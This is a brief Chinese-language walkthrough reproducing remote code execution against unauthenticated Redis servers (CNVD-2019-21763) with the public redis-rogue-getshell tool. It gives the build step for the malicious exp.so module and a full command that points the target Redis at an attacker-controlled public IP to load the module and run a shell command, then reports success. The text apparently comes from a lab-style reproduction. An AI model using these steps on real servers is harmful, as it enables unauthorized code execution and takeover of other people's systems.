Redis未授权访问-CNVD-2019-21763复现

利用项目： https://github.com/vulhub/redis-rogue-getshell

解压后先进入到 RedisModulesSDK目录里面的exp目录下，make编译一下才会产生exp.so文件，后面再利用这个exp.so文件进行远程代码执行

需要python3环境

# 利用命令，命令中的攻击IP要用公网IP
python3 redis-master.py -r 目标IP -p 目标端口 -L 攻击IP -P 8888 -f RedisModulesSDK/exp/exp.so -c "id"

进入到exp目录下make一下

​

来到 redis-master.py文件所属目录下 执行命令，查看id

​​

命令执行成功

​​